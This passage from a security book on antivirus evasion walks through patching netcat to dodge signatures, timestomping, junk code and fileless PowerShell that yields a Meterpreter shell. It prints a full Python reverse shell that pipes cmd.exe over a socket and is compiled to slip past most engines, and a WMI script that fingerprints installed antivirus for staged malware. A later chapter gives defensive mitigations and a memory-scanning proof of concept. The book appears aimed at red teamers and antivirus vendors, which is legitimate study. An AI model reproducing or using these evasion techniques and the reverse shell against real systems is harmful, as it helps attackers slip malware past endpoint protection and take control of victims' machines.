encrypted as follows: 1. The XOR instruction encrypts the initialized data in the lower portion of the DX register (DL) using the key variable, which was initialized with the encryption key. 2. The XOR-encrypted data is now copied from the lower portion of the DX register (DL) to the lower portion of the BX register (BL). 3. Finally, the ret instruction is used to return from the function. After the program returns from the encryption subroutine, it will call the decrypt subroutine using the call decrypt instruction. Once execution passes to the decrypt subroutine, the input will be decrypted as follows: 1. The XOR instruction decrypts the initialized data in the lower portion of the BX register (BL) using the key operand, which was previously initialized with the encryption key, just as was done during the encryption phase. 2. The XOR-encrypted data is now copied from the lower portion of the BX register (BL) to the lower portion of the DX register (DL). 3. Finally, the ret instruction is used to return from the function. Finally, the program reaches the exit subroutine, which will handle the termination of the program. Now that we have some basic knowledge and are able to make sense of assembly instructions, we can move on to a more interesting example. 154 Other Antivirus Bypass Techniques Antivirus bypass using binary patching In the following example, we used netcat.exe (https://eternallybored. org/misc/netcat/), which is already signed and detected as a malicious file by most antivirus engines. When we opened the compiled file in x32dbg and came to the file's entry point, the first thing we saw was that the first function used the command sub esp, 18 – subtract 18 from the ESP register (as described earlier). To make sure we don't "break" or "corrupt" the file, meaning that the file will still be able to run within the operating system even after making changes, we made a minor change to the program's code. We changed the number 18 to 17, then performed patching on the file so it would be saved as part of the original executable on the computer's hard drive. When we uploaded the file to VirusTotal, we noticed that with this very minor change, we had actually succeeded in getting around 10 antivirus programs. Antivirus detections went down from 34 to 24. Theoretically speaking, any change to the contents of a file could bypass a different static antivirus engine, because we do not know which signatures each static engine is using. The following screenshot shows the original netcat.exe with the instruction sub esp, 18: Figure 6.6 – The sub esp, 18 instruction before the change Antivirus bypass using binary patching 155 And the following screenshot shows the same file after changing the value to 17: Figure 6.7 – The sub esp, 17 instruction after the change After changing this value, we need to patch the executable, by pressing Ctrl + P and clicking Patch File: Figure 6.8 – The Patch File button 156 Other Antivirus Bypass Techniques The following screenshot shows the number of detections for the netcat.exe file before the change: Figure 6.9 – VirusTotal's results of 34/70 detections And here we can see the number of detections for the modified file: Figure 6.10 – VirusTotal's results of 24/72 detections Antivirus bypass using binary patching 157 This relatively simple technique managed to bypass 10 different antivirus engines, which would not be able to detect the malicious file with this slight modification. Here is the antivirus software that did not detect the patched netcat.exe file: • Avast • AVG • Avira (No Cloud) • Bitdefender • CrowdStrike Falcon • Cybereason • Fortinet • F-Secure • G-Data • MalwareBytes • McAfee • Microsoft • Palo Alto Networks • Sophos • Symantec • Trend Micro Having learned about the basics of Assembly x86, the disassembly process, and binary patching, let's learn about the second bypass technique of binary patching. Timestomping Another technique we can perform on a compiled file is called Timestomping. This time, we're not editing the file itself, but instead, its creation time. One of the ways many antivirus engines use to sign malware is the date the file was created. They do this to perform static signing. For example, if the strings X, Y, and Z exist and the file was created on January 15, 2017, then the file is detected as malware of a particular kind. 158 Other Antivirus Bypass Techniques On the left side here, you can see netcat.exe in its original form. On the right, you can see the exact same file after I changed its creation time: Figure 6.11 – Before and after timestomping After this change, we can get around more static signatures that make use of the file creation time condition to detect the malware. Now that we know about binary patching using basic reverse engineering and timestomping, we will move on to learning about the next bypass technique we used during our research – the technique of antivirus bypass using junk code. Antivirus bypass using junk code 159 Antivirus bypass using junk code Antivirus engines sometimes search within the logic of the code to perform detection on it in order to later classify it as a particular type of malware. To make it difficult for antivirus software to search through the logic of the code, we can use junk code, which helps us make the logic of the code more complicated. There are many ways to use this technique, but the most common methods involve using conditional jumps, irrelevant variable names, and empty functions. For example, instead of writing malware that contains a single basic function with two ordinary variables (for instance, an IP address and a port number) with generic variable names and no conditions, it would be preferable, if we wished to complicate the code, to create three functions, of which two are empty (unused) functions. Within the malicious function, we can also add a certain number of conditions that will never occur and add some meaningless variable names. The following simple example diagram shows code designed to open a socket to the address of an attacker, On the right side, we have added junk code to complicate the original program while still producing the same functionality: Figure 6.12 – Pseudo junk code 160 Other Antivirus Bypass Techniques Besides using empty functions, conditions that will never occur, and innocent variable names, we can also confuse the antivirus software by performing more extensive operations that affect the hard drive. There are several ways to achieve this, including loading a DLL that does not exist and creating legitimate registry values. Here's an example: Figure 6.13 – Pseudo junk code In this diagram, you can see simple pseudo code that opens a connection using a socket to a command-and-control server of the attacker. On the left side is the code before the junk code technique is conducted, and on the right side, you can see the same functionality after the junk code technique is used. Important note Junk code can also be used with techniques such as control flow obfuscation to harden analysis for security researchers and to make the antivirus bypass potentially more effective. Now that we know how to use junk code to bypass antivirus software, we can continue to the next technique we used during our research, PowerShell. Antivirus bypass using PowerShell 161 Antivirus bypass using PowerShell Unlike the techniques we have introduced so far, this technique is not based on a malicious executable file but is used mostly as fileless malware. With this technique, there is no file running on the hard drive; instead, it is running directly from memory. While researching and writing this book, we used PowerShell fileless malware, the malicious functionality of which involves connecting to a remote server through a specific port. We divided the test into two stages. In the first part, we ran the payload from a PS1 file, which is saved to the hard drive, and in the second part, we ran the payload directly from PowerShell.exe. The following screenshot illustrates that the Sophos antivirus software managed to successfully detect the PS1 file with the malicious payload saved to the hard drive with the name PS.ps1: Figure 6.14 – Sophos Home detected the malicious PS1 file Then, instead of running the malicious payload from the PS1 file saved to the hard drive, we ran the exact same payload, this time directly from PowerShell.exe. In the following screenshot, there is a pseudo payload that we have used to demonstrate this concept: Figure 6.15 – The beginning of the payload that is used in the malicious PS1 file 162 Other Antivirus Bypass Techniques In this screenshot, you can see that the payload ran directly from PowerShell.exe, with the Sophos antivirus software running in the background. It seems as if the antivirus software would be able to detect this payload – after all, it just stopped the exact same payload in the PS1 file. But after running the payload directly from PowerShell.exe, we were able to get a Meterpreter shell on the endpoint, even though the Sophos Home Free antivirus was installed on it: Figure 6.16 – A Meterpreter shell on an endpoint with Sophos Home installed on it It is possible that the reason the Sophos antivirus software did not detect the malicious payload is that it was not using the heuristic engine correctly. Despite the fact that the file had already been detected as malware just a minute before running it in PowerShell.exe, the bypass may have worked because the heuristic engine detected that the payload was running through PowerShell.exe, which is a file signed by Microsoft. Having understood this technique, let's proceed with the last one. Now that we know why PowerShell is powerful to bypass antivirus software, we can move on to learning the last bypass technique we used during our research – the technique of antivirus bypass using a single malicious functionality. Antivirus bypass using a single malicious functionality 163 Antivirus bypass using a single malicious functionality One of the central problems that antivirus software vendors need to deal with is false positives. Antivirus software is not supposed to report to the user every single little insignificant event taking place on the endpoint. If it does, the user may be forced to abandon the antivirus software and switch to another antivirus software that creates fewer interruptions during regular use. To deal with false-positive detection, antivirus vendors increase their detection rate. For example, if a file is not signed in the static and dynamic engines, the heuristic engine goes into operation and starts to calculate on its own whether the file is malicious using all sorts of parameters. For example, the antivirus software will try to determine whether the file is opening a socket, performing dropping into the persistence folder, and receiving commands from a remote server. The rate can be 70%, for example, that the file is detected as malicious and the antivirus software will stop it from running. To take advantage of this situation to perform antivirus bypass, we need to ask an important question: Will the antivirus software issue an alert for a malicious file when the file performs a single malicious function? Therefore, it depends on the functionality. If we are talking about functionality that is not necessarily malicious, the antivirus will detect the file as containing a malicious function, but the score won't be high enough to issue an alert to the user or prevent the malicious file from running, thus the antivirus software will allow the file to run. This kind of behavior of the heuristic engine is exactly what we can take advantage of to bypass antivirus software. The following diagram illustrates how each file is rated. As we explain in the following diagram, if only one of the conditions is true, the file's score increases and the antivirus software detects the file as malicious and signs it. 164 Other Antivirus Bypass Techniques But if the score is low, the antivirus will not issue a malware alert, even though it contains malicious functionality: Figure 6.17 – "ML" diagram To best illustrate this technique, and for proof-of-concept purposes, we will use a Python program that connects to a remote command and control server to receive remote commands (https://stackoverflow.com/questions/37991717/python- windows-reverse-shell-one-liner): import os, socket, sys import threading as trd import subprocess as sb def sock2proc(s, p):     while True:         p.stdin.write(s.recv(1024).decode()); p.stdin.flush() def proc2sock(s, p): Antivirus bypass using a single malicious functionality 165     while True:          s.send(p.stdout.read(1).encode()) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) while True:     try:          s.connect(("", 443))         break     except:          pass p=sb.Popen(["cmd.exe"], stdout=sb.PIPE, stderr=sb. STDOUT, stdin=sb.PIPE, shell=True, text=True) trd.Thread(target=sock2proc, args=[s,p], daemon=True).start() trd.Thread(target=proc2sock, args=[s,p], daemon=True).start() try:      p.wait() except:      s.close()     sys.exit(0) To compile the preceding code to an executable, we will use the following pyinstaller command: pyinstaller --onefile socket_example.py 166 Other Antivirus Bypass Techniques After we have compiled the preceding Python code, we execute it on an endpoint machine to get a reverse shell, while our listener (Netcat in this case) is in listening mode on port 443: Figure 6.18 – A netcat-based shell Following is a screenshot of the results of VirusTotal after uploading this malicious file: Figure 6.19 – VirusTotal's results – 9/70 detections Antivirus bypass using a single malicious functionality 167 As can be seen, this technique succeeded in bypassing 61 antivirus detection engines that will not detect this malicious file. The following list shows the antivirus software vendors that did not detect our uploaded file: • Avira (No Cloud) • Bitdefender • Comodo • Check Point ZoneAlarm • Cybereason • Cyren • FireEye • Fortinet • F-Secure • Kaspersky • MalwareBytes • McAfee • Palo Alto Networks • Panda • Qihoo-360 • SentinelOne (Static ML) • Sophos • Symantec • Trend Micro We do not have to write malware in Python at all; we can also use C, C++, AutoIt, and many other languages. However, it is important to realize that if the number of malicious functions is low, the ability of the malware will also be limited. It is fair to assume that the permissions of the malware will be basic, it won't have persistence, and so on. 168 Other Antivirus Bypass Techniques The power of combining several antivirus bypass techniques It is important to note that, practically speaking, in order to perform bypassing on an antivirus engine in the real world, you must use a combination of multiple bypass techniques, not just a single one. Even if a specific technique manages to get past a static engine, it is reasonable to assume that a dynamic and/or heuristic engine will be able to detect the file. For example, we can use a combination of the following techniques to achieve a full antivirus bypass: Figure 6.20 – A combination of several techniques to bypass antivirus software in the real world To demonstrate the concept of combining several antivirus bypass techniques, we will use an amazing Python script named peCloak.py developed by Mike Czumak, T_V3rn1x, and SecuritySift. This tool, as defined by the developers, is a Multi-Pass Encoder & Heuristic Sandbox Bypass AV Evasion Tool that literally combines several antivirus bypass techniques to bypass heuristic and static engines. The power of combining several antivirus bypass techniques 169 The following antivirus bypass techniques are implemented in the tool: • Encoding – To bypass the static antivirus engine. • Heuristic bypass – Basically, the use of junk code in order to make the antivirus believe that it is a benign executable. • Code cave insertion – The Python script peCloak.py will insert a code cave based on a pre-defined number of sequential null-bytes, and if true, it will insert the code to this location. If sequential null bytes were not found, it will create a new section in the PE file (named .NewSection by default). At the end of the code cave, there will be a restoration of execution flow. Let's now do a comparison between a regular payload file and one that is peCloaked. An example of an executable before and after peCloak After a brief explanation about the peCloak tool, let's now see an example of an executable after it has been peCloaked. Here is an executable file with some standard sections before the use of the tool: Figure 6.21 – An executable before it has been peCloaked 170 Other Antivirus Bypass Techniques In the following screenshot, the same executable file is presented but after it has been peCloaked: Figure 6.22 – An executable after it has been peCloaked Notice the newly added section named .NewSec. Now let's view the code in IDA disassembler and see where the newly added section is called. In the following screenshot, you can see the start function that immediately calls the sub_40B005 function, which will be the location of the newly added code cave under the .NewSec section: Figure 6.23 – The start of the executable's code, which calls sub_40B005 And in the following screenshot, we can see the newly added code that is under the newly added section of .NewSec: The power of combining several antivirus bypass techniques 171 Figure 6.24 – The code of the newly added code cave in the .NewSec section There is much more to understand in peCloak.py; we have only demonstrated its code caving feature and generally discussed its other features. How does antivirus software not detect it? The reason that antivirus software does not detect such files or executables is that antivirus software detections are based on pre-defined patterns that can be somehow predicted by the malware. The peCloak.py tool not only implements several interesting antivirus bypass techniques but also makes the file or executable not predictable and thus hard to detect by the fact that patterns change with each use of such a tool. To summarize, you do not have to use tools such as peCloak, but you can definitely learn a lot from it and implement your own tools in order to bypass antivirus software. Also, learning from such tools can provide a lot of knowledge and insight for antivirus vendors and their security analysts and more ideas on how to implement detection mechanisms for such bypass techniques that are based on different approaches. In the next section, we will present a table of all the antivirus software and EDR vendors we bypassed in our research. 172 Other Antivirus Bypass Techniques Antivirus engines that we have bypassed in our research The following table summarizes antivirus software we have researched and bypassed using the bypass techniques explored in this book: Bypassed antivirus software with proof-of-concept Summary 173 Bypassed antivirus software without proof of concepts (uploaded to VirusTotal only) Table 6.1 – Bypassed Antivirus Summary In this chapter of the book, we learned about other antivirus bypass techniques that can be potentially used for bypassing both static and dynamic engines. The techniques presented in the chapter were binary patching, junk code, PowerShell, and a single malicious functionality. In the binary patching technique, we learned the basics of reverse engineering x86 Windows-based applications and the timestomping technique that is used to manipulate the timestamp of executable files. 174 Other Antivirus Bypass Techniques In the junk code technique, we explained the use of if block statements, which will subvert the antivirus detection mechanism. In the PowerShell technique, we used the PowerShell tool to bypass the antivirus. And in the single malicious functionality technique, we asked an important question to better understand the antivirus detection engine perspective and answered the question followed by a practical example. In the next chapter, we will learn about what can we do with the antivirus bypass techniques that we have learned so far in the book. Further reading We invite and encourage you to visit the proof-of-concept videos on the following YouTube playlist at the following link: https://www.youtube.com/ playlist?list=PLSF7zXfG9c4f6o1V_RqH9Cu1vBH_tAFvW Figure 6.25 – The YouTube channel with the Proof-of-Concept videos Section 3: Using Bypass Techniques in the Real World In this section, we'll look at using the antivirus bypass technique approaches, tools, and techniques we've learned about in real-world scenarios, distinguish between penetration tests and red team operations, and understand how to practically fingerprint antivirus software. Furthermore, we'll learn the principles, approaches, and techniques to write secure code and to enrich antivirus detection capabilities. This part of the book comprises the following chapters: • Chapter 7, Antivirus Bypass Techniques in Red Team Operations • Chapter 8, Best Practices and Recommendations 7 Antivirus Bypass Techniques in Red Team Operations In this chapter, you will learn about the use of antivirus bypass techniques in the real world, and you also will learn about the difference between penetration testing and red teaming, along with their importance, as well as how to fingerprint antivirus software as part of a stage-based malware attack. After we have finished our research and found antivirus software bypass techniques in a lab environment, we will want to transfer our use of them to the real world—for example, in a red team operation. In this chapter, we will explore the following topics: • What is a red team operation? • Bypassing antivirus software in red team operations • Fingerprinting antivirus software 178 Antivirus Bypass Techniques in Red Team Operations Technical requirements Check out the following video to see the code in action: https://bit.ly/3xm90DF What is a red team operation? Before we understand what a red team is and what its sole purpose is, it is important to first understand what a penetration test is—or in its shorter form, a pentest. A pentest is a controlled and targeted attack on specific organizational assets. For instance, if an organization releases a new feature in its mobile application, the organization will want to check the security of the application and consider other aspects such as regulatory interests before the new feature is implemented into their production environment. Of course, penetration tests are not just conducted on mobile applications but also on websites, network infrastructure, and more. The main goal of a penetration test is to test an organization's assets to find as many vulnerabilities as possible. In a penetration test, practical exploitation followed by Proof of Concept (PoC) proves that an organization is vulnerable, and thus its integrity and information security can be impacted. At the end of a penetration test, a report must be written that will include each of the found vulnerabilities, prioritized by its relevant risk severity—from low to critical—and this will then be sent to the client. It is also important to note that the goal of penetration testing is not to find newly undisclosed vulnerabilities, as this is done in vulnerability research projects. In a red team, the goal is different—when a company wants to conduct a red team operation, the company will want to know whether they could be exposed to intrusions, whether this is through a vulnerability found in one of their publicly exposed servers, through social engineering attacks, or even as a result of a security breach by someone impersonating some third-party provider and inserting a Universal Serial Bus (USB) stick that is pre-installed with some fancy malware. In a red team operation, important and sensitive data is extracted, only this is done legally. A real red team does not include any limitations. Now that we understand what a red team is, let's discuss about bypassing antivirus software in red team operations. Bypassing antivirus software in red team operations 179 Bypassing antivirus software in red team operations There are a lot of advantages to bypassing antivirus software in your professional journey when performing red team operations. In order to use this valuable knowledge, you will need to understand on which endpoint you are going to perform the bypass, using various techniques. When performing red team operations on a company, one of the primary goals is to extract sensitive information from an organization. To do this, we will need to receive some type of access to the organization. For instance, if the organization uses Microsoft 365, extraction of information may be accomplished by using a simple phishing page for company employees, connecting to one of the employees' user accounts, and stealing information already located in the cloud. But that is not always the case. Nowadays, companies still store their internal information in their Local Area Network (LAN)—for example, within Server Message Block (SMB) servers—and we as hackers must deal with this and adapt the hacking technique to the case at hand. When we compromise an endpoint and try to infiltrate it with malicious software, most of the time we do not know which antivirus software is running on the endpoint. Since we do not know which antivirus software is implemented in the targeted organization endpoints, we do not know which technique to use either, as a technique that works to bypass a particular antivirus software will probably not work when trying to bypass another. That is why we need to perform antivirus fingerprinting on the endpoint. Before we infiltrate the endpoint with malicious software, we need to infiltrate with different software, which will constitute the first stage of our attack, as illustrated in the following diagram: Figure 7.1 – The two stages of antivirus bypass in a red team operation 180 Antivirus Bypass Techniques in Red Team Operations The purpose of the first stage of the malware attack is to perform identification and to inform us which antivirus software is installed on the victim endpoint. Earlier, during the lead-gathering stage, we saw that antivirus software adds registry values and services, creates folders with the antivirus software name, and more. So, we are taking advantage of precisely this functionality in order to determine which antivirus software is operating on the victim's system. Now that we have got a sense and understanding of a penetration test and a red team, we can now proceed to the next part, where we will learn to fingerprint antivirus software in target Windows-based endpoints. Fingerprinting antivirus software Antivirus fingerprinting is a process of searching and identifying antivirus software in a target endpoint based on identifiable constants, such as the following: • Service names • Process names • Domain names • Registry keys • Filesystem artifacts The following table will help you perform fingerprinting of antivirus software on the endpoint by the service and process names of the antivirus software: Fingerprinting antivirus software 181 Table 7.1 – Antivirus processes and services 182 Antivirus Bypass Techniques in Red Team Operations Note You do not have to rely only on process and service names—you can also rely on registry names, and more. We recommend that you visit the Antivirus- Artifacts project at https://github.com/D3VI5H4/Antivirus- Artifacts to find out more about this. We can perform fingerprinting on a simple Python script, for instance, which will monitor all processes running on the operating system and compare predetermined strings. For example, let's look at the following simple and elegant code: import wmi print("Antivirus Bypass Techniques by Nir Yehoshua and Uriel Kosayev") Proc = wmi.WMI() AV_Check = ("MsMpEng.exe", "AdAwareService.exe", "afwServ. exe", "avguard.exe", "AVGSvc.exe", "bdagent. exe", "BullGuardCore.exe", "ekrn.exe", "fshoster32. exe", "GDScan.exe", "avp.exe", "K7CrvSvc.exe", "McAPExe. exe", "NortonSecurity.exe", "PavFnSvr.exe", "SavService. exe", "EnterpriseService.exe", "WRSA.exe", "ZAPrivacyService. exe") for process in Proc.Win32_Process():     if process.Name in AV_Check:         print(f"{process.ProcessId} {process.Name}") As you can see, using the preceding Python code, we can determine which antivirus software is actually running on a victim endpoint by utilizing Windows Management Instrumentation (WMI). With this knowledge of which antivirus software is actually deployed in the targeted victim endpoint, as well as knowledge of the gathered research leads, we can then download the next-stage malware that is already implemented with our antivirus bypass and anti-analysis techniques. To compile this script, we will use pyinstaller with the following command: pyinstaller --onefile "Antivirus Fingerprinting.py" In the following screenshot, we can see that the script detects the Microsoft Defender antivirus software on the endpoint by its process name: Fingerprinting antivirus software 183 Figure 7.2 – Executing Antivirus Fingerprinting.exe In the following screenshot, you can see the results from VirusTotal, which show that in fact, six different antivirus engines detected our legitimate software as a malicious one: Figure 7.3 – VirusTotal's detection rate of 6/64 antivirus engines It is important to mention the name of the signatures that triggered the detections in each one of these antivirus engines. These are listed here: 1. Trojan.PWS.Agent!m7rD4I82OUM 2. Trojan:Win32/Wacatac.B!ml 3. Trojan.Disco.Script.104 These detections are, in fact, false positives. 184 Antivirus Bypass Techniques in Red Team Operations In addition, Microsoft Defender also detected our software as malware, and the demonstration itself was conducted on one of our endpoints that was pre-installed with the Microsoft Defender antivirus software. It is important to understand that the detection rate in each uploaded sample in VirusTotal changes after clicking on the Reanalyze file button. In the following screenshot, you can see the same file, after almost 3 months since the first submission: Figure 7.4 – VirusTotal's detection rate of 1/64 antivirus engines Tip After writing antivirus bypass custom-made code and being sure that the antivirus software detects it as a false positive, try to wait some time and you will most likely see a drop in the detection rate. Many malware authors and threat actors use this technique to identify which antivirus software is installed on the victim endpoint in order to apply the relevant bypass technique. The following is a great example of malware that does just that: Fingerprinting antivirus software 185 Figure 7.5 – An IDA Pro view, a malware that enumerates antivirus process names The malware enumerates process names such as V3SP.EXE, SPIDERAGENT.EXE, and EKRN.EXE, which relate to AhnLab, Dr.Web, and ESET antivirus vendors, respectively. 186 Antivirus Bypass Techniques in Red Team Operations Tip Antivirus software can also be detected based on other artifacts that can be found on the targeted system by enumerating services, registry keys, open mutex values, files and folders in the filesystem, and more. Summary In this chapter, we learned how to reveal which antivirus software is installed on an endpoint by using a WMI process enumeration technique and looked at the importance of adapting your antivirus bypass techniques to specific antivirus software. There are innumerable ways to implement a red team operation that includes antivirus software fingerprinting and antivirus bypass. The Python code that we have used in this chapter was actually a small part of our stage- based malware attack that we used in one of our red team operations conducted on our clients legally. In the next chapter, we will learn how antivirus vendors can improve most antivirus engines in order to prevent antivirus bypass. 8 Best Practices and Recommendations In this chapter, we will explain what the antivirus software engineers did wrong, why the antivirus bypass techniques worked, and how to make antivirus software better with secure coding and other security tips. Now that we have explained and shown examples of the three most basic vulnerabilities that can be used for antivirus bypass, as well as having presented the 10 bypass techniques we have used in our own research, this chapter will outline our recommendations. It is important to be aware that not all antivirus bypass techniques have a solution, and it is impossible to create the "perfect product." Otherwise, every single company would use it and malware would not exist, which is why we have not offered solutions for every bypass technique. In this chapter, you will gain a fundamental understanding of secure coding tips and some other tips to detect malware based on several techniques. 188 Best Practices and Recommendations This chapter will be divided into three sections: • Avoiding antivirus bypass dedicated vulnerabilities – three ways to remediate the most basic vulnerabilities of several antivirus engines in research that can be used to bypass antivirus software. • Improving antivirus detection – three techniques to identify the most used antivirus bypass techniques we have mentioned in this book. • Secure coding recommendations – nine of our most basic recommendations in terms of how to write secure code, with an emphasis on antivirus. Technical requirements • Knowledge of the C or C++ programming languages • Basic security research knowledge • Basic knowledge of processes and threads • An understanding of Windows API functions • An understanding of YARA • An understanding of log-based data such as Windows event logs Throughout the book, we have presented and based our antivirus bypass techniques on the following two approaches: • Vulnerability-based bypass • Detection-based bypass Our main goal in this book is to stop and mitigate these bypass techniques by demonstrating them and offering mitigations for them. In the following section, you will learn how to avoid antivirus bypass that is based on dedicated vulnerabilities. Check out the following video to see the code in action: https://bit.ly/3wqF6OD Avoiding antivirus bypass dedicated vulnerabilities 189 Avoiding antivirus bypass dedicated vulnerabilities In this section, you will learn how to prevent the vulnerabilities we presented in Chapter 3, Antivirus Research Approaches. How to avoid the DLL hijacking vulnerability To mitigate DLL hijacking attacks, the caller process needs to use a proper mechanism to validate the loaded DLL module not only by its name but also by its certificate and signature. Also, the loading process (like the antivirus software) can, for example, calculate the hash value of the loaded DLL and check if it is the legitimate, intended DLL that is to be loaded, using Windows API functions such as LoadLibraryEx followed by the validation of specific paths to be loaded from, rather than the regular LoadLibrary, which simply loads a DLL by a name that attackers can easily mimic. In other words, the LoadLibraryEx function has the capability of validating a loaded DLL file by its signature, by specifying the flag of LOAD_LIBRARY_REQUIRE_SIGNED_ TARGET (0x00000080), in the function parameter of dwFlags. Finally, it must load DLLs using fully qualified paths. For example, if the antivirus needs to load a DLL such as Kernel32.DLL, it should load it not simply by its name but using the full path of the DLL: C:\\Windows\\System32\\Kernel32.dll Here, we can see the Malwarebytes antivirus software, which uses LoadLibraryEx() and identifies it when we attempt to replace one DLL with another: Figure 8.1 – A failed attempt of DLL hijacking 190 Best Practices and Recommendations In the preceding screenshot, you can see a failed attempt at loading an arbitrary DLL to the mbam.exe process. In the following screenshot, you can see the use of LoadLibraryExW in Malwarebytes's mbam.exe process, which prevents the loading of arbitrary DLL files: Figure 8.2 – The use of LoadLibraryExW in mbam.exe Let's now go into avoiding the next dedicated vulnerability that can be used to bypass antivirus software – Unquoted Service Path. How to avoid the Unquoted Service Path vulnerability The solution is simply to wrap quotation marks around the executable path of the service. This will prevent potentially fatal crashes of your antivirus software and will prevent potential bypasses, escalation of privileges, and persistence on victim machines. In other words, it's one simple solution for a problem that can have serious consequences. The following screenshot demonstrates that the Malwarebytes service uses a path placed within quotation marks so that it's impossible to bypass it using the unquoted service path vulnerability: Figure 8.3 – Quoted service path in Malwarebytes The next screenshot demonstrates that the REVE antivirus product is susceptible to the Unquoted Service Path vulnerability since its paths do not use quotation marks: Figure 8.4 – Multiple Unquoted Service Path in REVE antivirus software Avoiding antivirus bypass dedicated vulnerabilities 191 Usually, this basic vulnerability will exist in small antivirus vendors that need to provide some level of security to the end user, but in practice, these antivirus products can be bypassed using this vulnerability, thus making the end user susceptible to attacks. In the following screenshot, you can see that the Max Antivirus is vulnerable to Unquoted Service Path in four different paths: Figure 8.5 – Multiple Unquoted Service Path in Max Secure Total Security antivirus software Now that we have an idea how to avoid the Unquoted service path vulnerability, let's learn how to avoid buffer overflow vulnerabilities. How to avoid buffer overflow vulnerabilities Following is a list of practices, capabilities, and features that can be used to prevent buffer overflow vulnerabilities. Memory boundary validation Validate memory boundaries and use more secure functions such as strcpy_s() and strcat_s() that provide memory boundary checks by default. Stack canaries Use stack canaries to validate execution flow before returning from a function. This is a good practice, but keep in mind that it can also be bypassed. Data Execution Prevention (DEP) This will prevent the stack from being an executable one so malicious code will not have the permission to execute itself. This does not fully prevent buffer overflow, but definitely makes exploiting this vulnerability harder for attackers. Address Space Layout Randomization (ASLR) This is yet another strategy to make exploiting this vulnerability harder for adversaries because, as the name suggests, ASLR randomizes the address space in the operating system, making it tougher to exploit buffer overflow vulnerabilities, for example, those based on Return Oriented Programming (ROP) chains. 192 Best Practices and Recommendations Reverse engineering and fuzzing This strategy involves entering the mind of an attacker to try to break your own antivirus software. To do this, you can reverse engineer its components, gaining an understanding of its inner workings. Using fuzzing tools, you may be able to derive interesting information that you might not be able to discover using secure coding practices, or even SAST (Static Application Security Testing) and DAST (Dynamic Application Security Testing) practices followed by automation. However, in all cases, keep in mind that all of these security strategies can be bypassed. The adversarial mind is highly motivated, intelligent, and adaptive and learns very quickly. Think like them and you can defeat them. Now that we understand how to mitigate some of the vulnerability-based bypasses in antivirus software, let's continue to understand how to improve antivirus detection. Improving antivirus detection In this section, we will discuss how to strengthen the detection of antivirus software in order to make the antivirus software more reliable using the dynamic YARA concept, the detection of process injection attempts, and more. Dynamic YARA As mentioned in Chapter 5, Bypassing the Static Engine, YARA is an easy-to-use, straightforward, yet effective tool to hunt for malicious patterns in files. It can not only be used on files but also to hunt for malicious strings, functions, and opcodes at the memory level. The yarascan volatility plugin makes practical use of "dynamic" YARA to scan for potentially malicious strings and code at the memory level, or in practical terms, on a dumped memory snapshot. We believe that all antivirus vendors should implement this strategy (if they have not already) as part of their detection engines. Why this capability is helpful The dynamic YARA strategy gives your antivirus detection engine the ability to hunt and detect strings, assembly instructions, functions, and more at the runtime memory level using pre-written or customized YARA rules. This capability can be very helpful in detecting malicious patterns in processes, loaded drivers, DLLs, and more. However, the most important thing about this capability is that it allows the engine to detect malware after it has deobfuscated, unpacked, and decrypted at the memory level. Improving antivirus detection 193 Hunting for malicious strings – proof of concept To better understand this concept, we built a simple C/C++ Proof of Concept (PoC) program that demonstrates this potential capability, running on the Windows operating system, without the actual use of YARA, just using a simple string comparison. We believe that similar code, in a more robust form than what we created, can be implemented alongside YARA in antivirus detection engines. The following is the PoC code that demonstrates the building blocks of this concept (https://github.com/ MalFuzzer/Code_for_Fun/blob/master/MalHunt/string_hunt%20 with%20CreateToolhelp32Snapshot.cpp). First, we import some important libraries using the #include directive. These libraries include functions that are needed to get our proof of concept up and running: #include <Windows.h> #include <iostream> #include <vector> #include <Tlhelp32.h> Here are brief explanations of each library used: • Windows.h – C/C++ header file that contains declarations for all of the Windows API functions • iostream – Standard input/output stream library • vector – Array that stores object references • Tlhelp32.h – C/C++ header file that contains functions such as CreateToolhelp32Snapshot, Process32First, Process32Next, and more These includes and functions will provide us with the capabilities of using different Windows API functions, providing input and output, defining object reference arrays, and getting a current snapshot of all running processes. Let's start from the beginning, with the main() function: int main() { const char yara[] = "malware"; // It's not an actual YARA rule, it's only a variable name std::vector<DWORD> pids = EnumProcs(); 194 Best Practices and Recommendations for (size_t i = 0; i < pids.size(); i++) { char* ret = GetAddressOfData(pids[i], yara, sizeof(yara)); if(ret) { std::cout << "Malicious pattern found at: " << (void*)ret << "\n"; TerminateProcessEx(pids[i], 0); continue; } } return 0; } The first lines in the main() function define the designated malicious strings or patterns to look for and call a function named EnumProcs(), which, as its name suggests, will enumerate all of the current running processes using Windows API functions, as we will explain later. Next, we cycle through a for loop of process identifiers (PIDs), checking for each one whether the return value includes our malicious string or pattern (defined using the string constant yara). If the string or pattern is present, the program will raise an alert and terminate the malicious process by calling the TerminateProcessEx() Windows API function with the PID of the malicious process. Now, let's dive into the EnumProc() function in order to understand how it actually enumerates all of the currently running processes on the system: std::vector<DWORD> EnumProcs() { std::vector<DWORD> pids; HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_ SNAPPROCESS, 0); if (snapshot != INVALID_HANDLE_VALUE) { PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32) }; if (Process32First(snapshot, &pe32)) { do Improving antivirus detection 195 { pids.push_back(pe32.th32ProcessID); } while (Process32Next(snapshot, &pe32)); } CloseHandle(snapshot); } return pids; } As seen in the preceding code block, the function is defined as a DWORD vector array to hold all of the returned PID numbers of the processes in an array. Then, the CreateToolhelp32Snapshot Windows API function takes a "snapshot" of all the current running processes in the operating system and, for each process, other significant accompanying data such as modules, heaps, and more. Next, the Process32First function retrieves the first encountered process in the system, followed by the Process32Next function. Both of these functions retrieve the PID number of the system processes from the initial snapshot. After retrieving all running Windows processes, it is time to retrieve significant data from their memory. Now, let's dive into the GetAddressOfData() function in order to understand how it reads the memory content of each enumerated process: char* GetAddressOfData(DWORD pid, const char *data, size_t len) { HANDLE process = OpenProcess(PROCESS_VM_READ | PROCESS_ QUERY_INFORMATION, FALSE, pid); if(process) { SYSTEM_INFO si; GetSystemInfo(&si); MEMORY_BASIC_INFORMATION info; std::vector<char> chunk; char* p = 0; while(p < si.lpMaximumApplicationAddress) { if(VirtualQueryEx(process, p, &info, sizeof(info)) == sizeof(info)) 196 Best Practices and Recommendations { p = (char*)info.BaseAddress; chunk.resize(info.RegionSize); SIZE_T bytesRead; if(ReadProcessMemory(process, p, &chunk[0], info.RegionSize, &bytesRead)) { for(size_t i = 0; i < (bytesRead - len); ++i) { if(memcmp(data, &chunk[i], len) == 0) { return (char*)p + i; } } } p += info.RegionSize; } } } return 0; } The GetAddressOfData() function has three parameters: the pid parameter that contains the enumerated PID number, the data parameter 